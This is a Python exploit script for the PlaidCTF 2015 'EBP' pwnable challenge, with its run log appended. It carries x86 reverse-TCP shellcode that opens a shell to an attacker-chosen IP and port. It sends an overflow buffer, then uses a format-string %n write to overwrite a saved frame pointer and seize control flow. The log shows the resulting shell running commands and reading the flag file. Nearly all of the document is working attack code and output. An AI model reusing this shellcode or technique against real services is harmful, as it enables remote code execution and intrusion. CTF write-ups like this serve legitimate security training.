PlaidCTF 2015 - EBP

1. #!/usr/bin/python
2. # -*- coding: utf-8 -*-
3. #
4. # PlaidCTF 2015
5. # PWNABLE EBP - 160pts
6. # Frame pointer overwrite
7. #
8. # danigargu @ w3b0n3s
9. #
10. # run as tcp server (debugging in local):
11. # socat -d -d TCP-LISTEN:4545,fork EXEC:"./ebp"
12. #
13.  
14. import socket
15. from struct import pack, unpack
16.  
17. HOST = '52.6.64.173'
18. PORT = 4545
19.  
20. def get_connection(host, port):
21.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
22.     s.connect((host, port))
23.     return s
24.  
25. def make_write4(what, offset):
26.     fmt = "%" + str(what) + "c%" + str(offset) + "$n"
27.     return fmt
28.  
29. def main():
30.  
31.     rev_ip   = "XXX.XXX.XXX.XXX"
32.     rev_port = 55555
33.  
34.     # reverse tcp shellcode
35.     shellcode = (
36.         "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" +
37.         "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51\x68" +
38.         socket.inet_aton(rev_ip) + "\x66\x68" + pack(">H", rev_port) +
39.         "\xb1\x02\x66\x51\x89\xe7\xb3\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66" +
40.         "\xcd\x80\x31\xc9\x39\xc1\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0" +
41.         "\x3f\x89\xd3\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0" +
42.         "\xb0\x3f\x89\xd3\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73" +
43.         "\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31" +
44.         "\xc0\xb0\x01\xcd\x80"
45.     )
46.  
47.     buf = 0x804A080
48.     saved_ebp = "BBBB"
49.     junk = "A" * 100
50.  
51.     sc_addr = buf + len(junk) + len(saved_ebp) + 4
52.     payload = junk + saved_ebp + pack("<I", sc_addr) + shellcode
53.     fake_frame = buf + len(junk)
54.  
55.     try:
56.         print "[*] connecting to %s:%d" % (HOST, PORT)
57.         s = get_connection(HOST, PORT)
58.         print "[*] sending payload..."
59.         s.send(payload + "\n")
60.         s.recv(0x400)
61.  
62.         # overwrite echo() saved ebp
63.         print "[*] overwriting echo() saved ebp"
64.         s.send(make_write4(fake_frame, 4) + "\n")        
65.         s.recv(0x400)
66.  
67.         # provoke break in while(1) at main() to get control of EIP
68.         s.close()
69.  
70.     except Exception,e:
71.         print e
72.  
73. if __name__ == '__main__':
74.     main()
75.  
76.  
77. """
78. $ ncat -lvvp 55555
79. Ncat: Version 6.47 ( http://nmap.org/ncat )
80. Ncat: Listening on :::55555
81. Ncat: Listening on 0.0.0.0:55555
82. Ncat: Connection from 52.6.64.173.
83. Ncat: Connection from 52.6.64.173:43058.
84. id
85. uid=1001(problem) gid=1001(problem) groups=1001(problem)
86. ls -l /home/problem
87. total 12
88. -r-xr-x--x 1 root root 7568 Apr 17 22:31 ebp
89. -r--r--r-- 1 root root   32 Apr 17 22:31 flag.txt
90. cat /home/problem/flag.txt
91. who_needs_stack_control_anyway
92. """